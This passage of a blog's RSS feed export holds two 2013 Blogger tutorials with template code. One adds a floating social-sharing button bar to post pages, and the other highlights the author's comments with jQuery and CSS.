jQuery(document).ready(function(b){var a=b("#w2bSocialFloat");a.wrap('&amp;lt;div id="w2bSocialPlaceholder"&amp;gt;&amp;lt;/div&amp;gt;').closest("#w2bSocialPlaceholder").height(a.outerHeight());a.width(a.outerWidth());e=a.offset().top-$theOffset;b("#w2bSocialFloat iframe[src*=plusone]").closest("div").css("max-width","82px");b(window).scroll(function(){d=b(this).scrollTop();d&amp;gt;=e?a.addClass("w2bFloatSocial"):a.removeClass("w2bFloatSocial");f=b(".post");if(f.length!=0){c=f.outerHeight()+f.offset().top;d&amp;gt;=c?a.stop().animate({top:"-150px"}):a.stop().animate({top:$theOffset+"px"})}else d&amp;gt;=e?a.css("top",$theOffset+"px"):a.css("top","0")})});
/*]]&amp;gt;*/
&amp;lt;/script&amp;gt;
&amp;lt;script type="text/javascript" src="http://widgets.way2blogging.org/blogger-widgets/w2b-blogger-pinit.js"&amp;gt;&amp;lt;/script&amp;gt;
&amp;lt;script type="text/javascript"&amp;gt;
/*&amp;lt;![CDATA[*/
 // Twitter
 (function(a,b,c){var d=a.getElementsByTagName(b)[0];if(!a.getElementById(c)){a=a.createElement(b);a.id=c;a.src="//platform.twitter.com/widgets.js";d.parentNode.insertBefore(a,d)}})(document,"script","twitter-wjs");
 // Google + (plus)
 (function(){var a=document.createElement("script");a.type="text/javascript";a.async=true;a.src="https://apis.google.com/js/plusone.js";var b=document.getElementsByTagName("script")[0];b.parentNode.insertBefore(a,b)})();
 // Stumbleupon
 (function(){var a=document.createElement("script");a.type="text/javascript";a.async=true;a.src="https://platform.stumbleupon.com/1/widgets.js";var b=document.getElementsByTagName("script")[0];b.parentNode.insertBefore(a,b)})();
 // Digg
 (function(){var a=document.createElement("SCRIPT"),b=document.getElementsByTagName("SCRIPT")[0];a.type="text/javascript";a.async=true;a.src="http://widgets.digg.com/buttons.js";b.parentNode.insertBefore(a,b)})();
/*]]&amp;gt;*/
&amp;lt;/script&amp;gt;
&amp;lt;/b:if&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;h4 style="border: 0px; color: #454545; font-family: 'Myriad Pro', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 1.6em; line-height: inherit; margin: 20px 0px; padding: 0px; text-transform: uppercase; vertical-align: baseline;"&gt;
&lt;span style="background-color: white;"&gt;ADDING SOCIAL BUTTONS WIDGET&lt;/span&gt;&lt;/h4&gt;
&lt;div style="border: 0px; color: #454545; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; line-height: 22px; margin-bottom: 15px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="background-color: white;"&gt;Let’s add the final Social horizontal bar widget code.&lt;br /&gt;Add this code before&amp;nbsp;&lt;code style="border-bottom-left-radius: 2px; border-bottom-right-radius: 2px; border-top-left-radius: 2px; border-top-right-radius: 2px; border: 0px; color: #111111; font-family: 'Courier New', monospace; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 1px 4px; vertical-align: baseline;"&gt;&amp;lt;data:post.body/&amp;gt;&lt;/code&gt;&amp;nbsp;tag.&lt;/span&gt;&lt;/div&gt;
&lt;pre style="border: 2px solid rgb(255, 231, 175); clear: both; color: #333333; font-family: 'Courier New', monospace; font-size: 14px; line-height: 18px; margin: 25px 5px; overflow: auto; padding: 0px; vertical-align: baseline;"&gt;&lt;code style="border-bottom-left-radius: 2px; border-bottom-right-radius: 2px; border-top-left-radius: 2px; border-top-right-radius: 2px; border: 0px; color: #657b83; display: block; font-family: 'Courier New', monospace; font-size: 12px; font-style: inherit; font-variant: inherit; line-height: 1.6; margin: 0px; overflow: auto; padding: 10px !important; vertical-align: baseline; word-wrap: break-word;"&gt;&lt;span style="background-color: white;"&gt;&amp;lt;b:if cond='data:blog.pageType == &amp;amp;quot;item&amp;amp;quot;'&amp;gt;
&amp;lt;div id="w2bSocialFloat" class="w2bSocialFloat"&amp;gt;
&amp;lt;table  width="100%" class="w2bSocialFloat"&amp;gt;
 &amp;lt;tr&amp;gt;
  &amp;lt;td&amp;gt;
   &amp;lt;a href="https://twitter.com/share" class="twitter-share-button" expr:data-url="data:post.url" expr:data-text="data:post.title"&amp;gt;Tweet&amp;lt;/a&amp;gt;
  &amp;lt;/td&amp;gt;
  &amp;lt;td&amp;gt;
   &amp;lt;iframe expr:src="&amp;amp;quot;//www.facebook.com/plugins/like.php?href=&amp;amp;quot; + data:post.url + &amp;amp;quot;&amp;amp;amp;send=false&amp;amp;amp;layout=button_count&amp;amp;amp;width=80&amp;amp;amp;show_faces=false&amp;amp;amp;action=like&amp;amp;amp;colorscheme=light&amp;amp;amp;font&amp;amp;amp;height=21&amp;amp;quot;" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:80px; height:21px;" allowTransparency="true"&amp;gt;&amp;lt;/iframe&amp;gt;
  &amp;lt;/td&amp;gt;
  &amp;lt;td&amp;gt;
   &amp;lt;div expr:id="&amp;amp;quot;w2bPinit-&amp;amp;quot; + data:post.id" style="display: none;visibility: hidden;height: 0;width:0;overflow: hidden;" class="w2bPinitButton"&amp;gt; 
    &amp;lt;data:post.body/&amp;gt;
    &amp;lt;script type="text/javascript"&amp;gt;
     w2bPinItButton({ 
      url:"&amp;lt;data:post.url/&amp;gt;", 
      thumb: "&amp;lt;data:post.thumbnailUrl/&amp;gt;", 
      id: "&amp;lt;data:post.id/&amp;gt;", 
      defaultThumb: "https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbx4argoRAbzoiN3ZQ7SEGvtvKT0yi8PyewvKMyCnksjmmgtec-UBlg4BHpOCFBC5ptPkvzw2gwrKHFHlkdqHY-K9QX4EE81V1VAiZLTL8_zPKYhCHtt4x_iczGyyRilQ_tpURzUrtLXys/s1600/w2b-no-thumbnail.jpg", 
      pincount: "horizontal" 
     }); 
    &amp;lt;/script&amp;gt; 
   &amp;lt;/div&amp;gt;
  &amp;lt;/td&amp;gt;
  &amp;lt;td&amp;gt;
   &amp;lt;div class="g-plusone" data-size="medium" expr:data-href="data:post.url"&amp;gt;&amp;lt;/div&amp;gt;
  &amp;lt;/td&amp;gt;
  &amp;lt;td&amp;gt;
   &amp;lt;su:badge layout="1" expr:location="data:post.url"&amp;gt;&amp;lt;/su:badge&amp;gt;
  &amp;lt;/td&amp;gt;
  &amp;lt;td&amp;gt;
   &amp;lt;a class="DiggThisButton DiggCompact"&amp;gt;&amp;lt;/a&amp;gt;
  &amp;lt;/td&amp;gt;
 &amp;lt;/tr&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/b:if&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;h4 style="border: 0px; color: #454545; font-family: 'Myriad Pro', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 1.6em; line-height: inherit; margin: 20px 0px; padding: 0px; text-transform: uppercase; vertical-align: baseline;"&gt;
&lt;span style="background-color: white;"&gt;SAVE TEMPLATE!!!&lt;/span&gt;&lt;/h4&gt;
&lt;div style="border: 0px; color: #454545; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; line-height: 22px; margin-bottom: 15px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="background-color: white;"&gt;Save the template and check your blog post pages, a working and awesome jQuery based floating social horizontal bar on your blog.&lt;/span&gt;&lt;/div&gt;
&lt;div style="border: 0px; color: #454545; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; line-height: 22px; margin-bottom: 15px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="background-color: white;"&gt;Hope this widget is helpful to you, Please leave your comments, and share this Widget.&lt;br /&gt;Thanks to&amp;nbsp;&lt;strong style="border: 0px; font-family: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;em style="border: 0px; font-family: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;Raghav&lt;/em&gt;&lt;/strong&gt;! for requesting this simple and awesome widget.&lt;/span&gt;&lt;/div&gt;
&lt;h3 style="-webkit-box-shadow: rgb(198, 198, 198) 0px 1px 3px, rgba(255, 255, 255, 0.4) 1px 1px 0px inset; background-image: url(https://turbo.way2blogging.org/wp-content/themes/way2blogging/images/h3.png); background-position: 4px 50%; background-repeat: no-repeat no-repeat; border-bottom-left-radius: 60px; border-bottom-right-radius: 60px; border-top-left-radius: 60px; border-top-right-radius: 60px; border: 3px solid rgb(200, 200, 0); box-shadow: rgb(198, 198, 198) 0px 1px 3px, rgba(255, 255, 255, 0.4) 1px 1px 0px inset; color: #a5a503; font-family: 'Myriad Pro', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 18px; line-height: 1; margin: 20px 3px; padding: 6px 10px 6px 30px; text-shadow: rgb(204, 204, 204) 0px 1px 0px; text-transform: uppercase; vertical-align: baseline;"&gt;
&lt;span style="background-color: white;"&gt;F.A.Q :-&lt;/span&gt;&lt;/h3&gt;
&lt;h4 style="border: 0px; color: #454545; font-family: 'Myriad Pro', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 1.6em; line-height: inherit; margin: 20px 0px; padding: 0px; text-transform: uppercase; vertical-align: baseline;"&gt;
&lt;span style="background-color: white;"&gt;1. I FOUND THE TAG THREE TIMES?&lt;/span&gt;&lt;/h4&gt;
&lt;div style="border: 0px; color: #454545; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; line-height: 22px; margin-bottom: 15px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="background-color: white;"&gt;If you found the&amp;nbsp;&lt;code style="border-bottom-left-radius: 2px; border-bottom-right-radius: 2px; border-top-left-radius: 2px; border-top-right-radius: 2px; border: 0px; color: #111111; font-family: 'Courier New', monospace; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 1px 4px; vertical-align: baseline;"&gt;&amp;lt;data:post.body/&amp;gt;&lt;/code&gt;&amp;nbsp;three times, then you might using the Auto readmore hack,&lt;br /&gt;&lt;strong style="border: 0px; font-family: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;Solution:&lt;/strong&gt;&lt;br /&gt;Search for below two lines&lt;/span&gt;&lt;/div&gt;
&lt;pre style="border: 2px solid rgb(255, 231, 175); clear: both; color: #333333; font-family: 'Courier New', monospace; font-size: 14px; line-height: 18px; margin: 25px 5px; overflow: auto; padding: 0px; vertical-align: baseline;"&gt;&lt;code style="border-bottom-left-radius: 2px; border-bottom-right-radius: 2px; border-top-left-radius: 2px; border-top-right-radius: 2px; border: 0px; color: #657b83; display: block; font-family: 'Courier New', monospace; font-size: 12px; font-style: inherit; font-variant: inherit; line-height: 1.6; margin: 0px; overflow: auto; padding: 10px !important; vertical-align: baseline; word-wrap: break-word;"&gt;&lt;span style="background-color: white;"&gt;&amp;lt;b:if cond='data:blog.pageType == &amp;amp;quot;item&amp;amp;quot;'&amp;gt;
&amp;lt;data:post.body/&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;div style="border: 0px; color: #454545; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; line-height: 22px; margin-bottom: 15px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="background-color: white;"&gt;Place the Widget code in between the two tags.&lt;/span&gt;&lt;/div&gt;
&lt;h4 style="border: 0px; color: #454545; font-family: 'Myriad Pro', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 1.6em; line-height: inherit; margin: 20px 0px; padding: 0px; text-transform: uppercase; vertical-align: baseline;"&gt;
&lt;span style="background-color: white;"&gt;2. HOW TO CHANGE THE BACKGROUND COLOR OF HORIZONTAL BAR?&lt;/span&gt;&lt;/h4&gt;
&lt;div style="border: 0px; color: #454545; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; line-height: 22px; margin-bottom: 15px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="background-color: white;"&gt;You can change the background color of Horizontal bar.&lt;br /&gt;&lt;strong style="border: 0px; font-family: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;Solution:&lt;/strong&gt;&lt;br /&gt;In the Second step (The Social Scripts), search for&lt;/span&gt;&lt;/div&gt;
&lt;pre style="border: 2px solid rgb(255, 231, 175); clear: both; color: #333333; font-family: 'Courier New', monospace; font-size: 14px; line-height: 18px; margin: 25px 5px; overflow: auto; padding: 0px; vertical-align: baseline;"&gt;&lt;code style="border-bottom-left-radius: 2px; border-bottom-right-radius: 2px; border-top-left-radius: 2px; border-top-right-radius: 2px; border: 0px; color: #657b83; display: block; font-family: 'Courier New', monospace; font-size: 12px; font-style: inherit; font-variant: inherit; line-height: 1.6; margin: 0px; overflow: auto; padding: 10px !important; vertical-align: baseline; word-wrap: break-word;"&gt;&lt;span style="background-color: white;"&gt;background:#FFFFFF;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;div style="border: 0px; color: #454545; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; line-height: 22px; margin-bottom: 15px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="background-color: white;"&gt;and change the&amp;nbsp;&lt;code style="border-bottom-left-radius: 2px; border-bottom-right-radius: 2px; border-top-left-radius: 2px; border-top-right-radius: 2px; border: 0px; color: #111111; font-family: 'Courier New', monospace; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 1px 4px; vertical-align: baseline;"&gt;#FFFFFF&lt;/code&gt;&amp;nbsp;with your own Hex Color.&lt;/span&gt;&lt;/div&gt;
&lt;div style="border: 0px; color: #454545; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; line-height: 22px; margin-bottom: 15px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="background-color: white;"&gt;Thanks to All.&lt;/span&gt;&lt;/div&gt;
&lt;div style="border: 0px; color: #454545; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 22px; margin-bottom: 15px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="background-color: white;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="border: 0px; color: #454545; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; line-height: 22px; margin-bottom: 15px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="font-size: large;"&gt;Thanks for visiting my blog I hope you enjoy this post and share it on socials&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdQh5FHdVvZmqtA7q0MmeKWkN1pBUYYXkX0nsfvYJ4xX6v5hyphenhyphenv-256hXcxgNueM3elEf0OY7vtJdVOfriCx9212oY1nuyFnR9hxP88iG7GOkny471sRjPzVk94Idqaq6WPbTHp87GaxrQ/s72-c/20130227-Figure4-ShareThis-ButtonStyles.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total></item><item><title>Highlight Author Comments in Blogger</title><link>https://snacksofhacks.blogspot.com/2013/02/highlight-author-comments-in-blogger.html</link><category>BlogGinG</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Mon, 25 Feb 2013 17:34:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-3441350317927969357.post-2620065359644702360</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="background-color: white; color: #333333; font-family: 'Kite One', sans-serif; font-size: 14px; line-height: 22.390625px;"&gt;
&lt;h2 class="post-title entry-title" style="color: #0084ce; font-family: Georgia, 'Times New Roman'; font-size: 22px; font-weight: normal; line-height: normal; margin: 0px 0px 5px; padding: 10px 0px 0px;"&gt;
&lt;/h2&gt;
&lt;h2 class="post-title entry-title" style="font-size: 22px; font-weight: normal; margin: 0px 0px 5px; padding: 10px 0px 0px;"&gt;
Highlight Author Comments in Blogspot/Blogger&lt;/h2&gt;
&lt;/div&gt;
&lt;div style="background-color: white; color: #333333; font-family: 'Kite One', sans-serif; font-size: 14px; line-height: 22.390625px;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white; color: #333333; font-family: 'Kite One', sans-serif; line-height: 22.390625px;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;&lt;span style="font-size: x-large;"&gt;H&lt;/span&gt;ighlight Author Comments System Displays Comments Made By A Post's Author In A Unique Style. Today I Will Show You&amp;nbsp;&lt;b&gt;How To&lt;/b&gt;&amp;nbsp;&lt;b&gt;Highlight Author Or Admin Comments&lt;/b&gt;&lt;b&gt;&amp;nbsp;In Blogspot/Blogger&lt;/b&gt;&amp;nbsp;So That Your Comment As Administrator Stands Out From Comments Posted By Others. Blogger Has Advanced and Many latest Codes Are Added. So To Highlight The Author Or The Admin Comment In Blogger You Have To Just Apply Some Easy Trick To Activate It. This Highlight Author Comments System Displays For Those Who Have&amp;nbsp;&lt;a href="http://www.mybloggerblog.com/2013/01/enable-threaded-comments-in-your.html" style="color: #289728; outline: none; text-decoration: none;" target="_blank"&gt;Enabled Threaded Comments System&lt;/a&gt;. We Have Attached A Screenshot Below So Anyone Can Easily Understand How Is This. Even I Am Also Using This For My Blog. &amp;nbsp;See Screenshot Below…&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white; color: #333333; font-family: 'Kite One', sans-serif; font-size: 14px; line-height: 22.390625px;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="background-color: white; clear: both; color: #333333; font-family: 'Kite One', sans-serif; font-size: 14px; line-height: 22.390625px; text-align: center;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align="center" style="background-color: white; color: #333333; font-family: 'Kite One', sans-serif; line-height: 22.390625px; text-align: center;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRacUxVqZGLg8-SGX2b4jp_7j4TuuMkYu_23fsIuEde4MZ5t9zaXtBkWqtLTFELQLb_KRWKSdRkp1NNxX7qQ31BK8rnI64g1VDXSCD87RuR1KAc4ajlz0FfXx-Zf-L0C1enWrSaE-UKb4/s1600/0.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="243" data-original-width="500" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRacUxVqZGLg8-SGX2b4jp_7j4TuuMkYu_23fsIuEde4MZ5t9zaXtBkWqtLTFELQLb_KRWKSdRkp1NNxX7qQ31BK8rnI64g1VDXSCD87RuR1KAc4ajlz0FfXx-Zf-L0C1enWrSaE-UKb4/s400/0.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white; color: #333333; font-family: 'Kite One', sans-serif; line-height: 22.390625px;"&gt;
&lt;h4 style="border-bottom-color: rgb(0, 0, 0); border-bottom-left-radius: 0px; border-bottom-right-radius: 30px; border-bottom-style: solid; border-bottom-width: 2px; border-left-color: rgb(13, 195, 4); border-left-style: solid; border-left-width: 15px; border-top-color: rgb(0, 0, 0); border-top-left-radius: 0px; border-top-right-radius: 30px; border-top-style: solid; border-top-width: 2px; box-shadow: rgb(198, 198, 198) 0px 1px 3px, rgba(255, 255, 255, 0.4) 1px 1px 0px inset; color: black; line-height: 1; margin: 15px 3px; padding: 6px 3px 6px 15px; text-shadow: rgb(255, 255, 255) 2px 2px 0px, rgb(255, 255, 255) -2px -2px 0px, rgb(204, 204, 204) 3px 3px 1px; text-transform: uppercase;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;FIRST OF ALL JUST FOLLOW THE SIMPLE STEPS BELOW:&lt;/span&gt;&lt;/h4&gt;
&lt;/div&gt;
&lt;ul style="background-color: white; color: #333333; font-family: 'Kite One', sans-serif; line-height: 22.390625px;"&gt;
&lt;li&gt;&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;Login To Blogger &amp;gt;&amp;gt;Go To&amp;nbsp;Template&amp;nbsp;&amp;gt;Edit HTML &amp;gt;&amp;gt;Proceed &amp;gt;&amp;gt;&amp;nbsp;Expand Widget Templates&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;&lt;span style="line-height: normal;"&gt;&lt;/span&gt;Now Find&amp;nbsp;&lt;span style="background-attachment: scroll; background-image: none; background-position: 0% 0%; background-repeat: repeat repeat; color: red;"&gt;&amp;lt;/Body&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;&lt;span style="line-height: normal;"&gt;&lt;/span&gt;After getting this code Put The Below Codes Above&amp;nbsp;&lt;span style="background-attachment: scroll; background-image: none; background-position: 0% 0%; background-repeat: repeat repeat; color: red;"&gt;&amp;lt;/Body&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote class="tr_bq" style="-webkit-transition: background-color 0.777s; background-color: #fcfdcc; border: 2px solid rgb(196, 196, 196); box-shadow: rgb(147, 247, 144) 0px 0px 7px; color: #333333; font-family: 'Kite One', sans-serif; line-height: 1.3em; margin: 20px; overflow: auto; padding: 10px 20px 10px 25px;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;&amp;lt;!-- highlight author Commens starts --&amp;gt;&lt;br /&gt;&amp;lt;script src='http://code.jquery.com/jquery-latest.js'/&amp;gt;&lt;br /&gt;&amp;lt;script&amp;gt;&lt;br /&gt;$(function() {&lt;br /&gt;function highlight(){&lt;br /&gt;$(&amp;amp;#39;.user.blog-author,.ssyby&amp;amp;#39;).closest(&amp;amp;#39;.comment-block&amp;amp;#39;)&lt;br /&gt;.css(&amp;amp;#39;border&amp;amp;#39;, &amp;amp;#39;&lt;/span&gt;&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;&lt;b&gt;&lt;span style="color: magenta;"&gt;Dotted&lt;/span&gt;&lt;/b&gt;&amp;nbsp;blue 1px&amp;amp;#39;)&lt;br /&gt;.css(&amp;amp;#39;background&amp;amp;#39;,&amp;amp;#39;&lt;b&gt;&lt;span style="color: #38761d;"&gt;#B2E7FD&lt;/span&gt;&lt;/b&gt;&amp;nbsp;url(&amp;amp;quot;http://4.bp.blogspot.com/-I_yj6d0ooQA/URbfFE2TatI/AAAAAAAABQk/lykKTHhRAxA/s1600/www.mybloggerblog.com.png&amp;amp;quot;)&amp;amp;#39;)&lt;br /&gt;.css(&amp;amp;#39;padding&amp;amp;#39;, &amp;amp;#39;10px&amp;amp;#39;);&lt;br /&gt;}&lt;br /&gt;$(document).bind(&amp;amp;#39;ready scroll click&amp;amp;#39;, highlight);&lt;br /&gt;});&lt;br /&gt;&amp;lt;/script&amp;gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;lt;!-- highlight author Commens ends --&amp;gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;ul style="background-color: white; color: #333333; font-family: 'Kite One', sans-serif; line-height: 22.390625px;"&gt;
&lt;li&gt;&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;Save The Template. (All Done)&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="MsoNormal" style="background-color: white; color: #333333; font-family: 'Kite One', sans-serif; line-height: 22.390625px; text-align: justify;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white; color: #333333; font-family: 'Kite One', sans-serif; line-height: 22.390625px;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;&lt;b&gt;Customization:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white; color: #333333; font-family: 'Kite One', sans-serif; line-height: 22.390625px;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;If You Want To Change The Border&amp;nbsp;Color Then Edit Blue (You Can&amp;nbsp;&lt;a href="http://www.mybloggerblog.com/2012/07/free-hex-color-code-generator.html" style="color: #289728; outline: none; text-decoration: none;" target="_blank"&gt;Use Hex Code For A Specific Color&lt;/a&gt;).I Have Used A&amp;nbsp;&lt;span style="color: magenta;"&gt;&lt;b&gt;Dotted&lt;/b&gt;&lt;/span&gt;&amp;nbsp;Border. Other Options Are (Simply Replacing 'Dotted' With One Of The Following Words): Solid, Dotted, Dashed, Groove, Ridge, Inset Etc…&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white; color: #333333; font-family: 'Kite One', sans-serif; line-height: 22.390625px;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: white; color: #333333; font-family: 'Kite One', sans-serif; line-height: 22.390625px;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;If You Want To Change The Background:&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: white; color: #333333; font-family: 'Kite One', sans-serif; line-height: 22.390625px;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;For Plain Colors without Any Image, Replace Line 8 in the Code above With This:&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white; color: #333333; font-family: 'Kite One', sans-serif; line-height: 22.390625px;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;.Css('Background','&lt;span style="color: #38761d;"&gt;&lt;b&gt;Green&lt;/b&gt;&lt;/span&gt;')&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: white; color: #333333; font-family: 'Kite One', sans-serif; line-height: 22.390625px;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;If You Want More Choices Of Plain Colors, Use HEX Code Instead:&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white; color: #333333; font-family: 'Kite One', sans-serif; line-height: 22.390625px;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;.Css('Background','&lt;span style="color: #38761d;"&gt;&lt;b&gt;#B2E7FD&lt;/b&gt;&lt;/span&gt;')&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: white; color: #333333; font-family: 'Kite One', sans-serif; line-height: 22.390625px;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;If You Want To Use Only A Background Image, Replace Line 8 In The Code Above With This:&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white; color: #333333; font-family: 'Kite One', sans-serif; line-height: 22.390625px;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;.Css('Background','Url("&lt;span style="color: #cc0000;"&gt;&lt;b&gt;Your IMAGE URL HERE&lt;/b&gt;&lt;/span&gt;")')&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: white; color: #333333; font-family: 'Kite One', sans-serif; line-height: 22.390625px;"&gt;
&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-color: white; color: #333333; font-family: 'Kite One', sans-serif; line-height: 22.390625px;"&gt;
&lt;b&gt;&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;Credits:&lt;/span&gt;&lt;span style="font-family: &amp;quot;trebuchet ms&amp;quot; , sans-serif;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
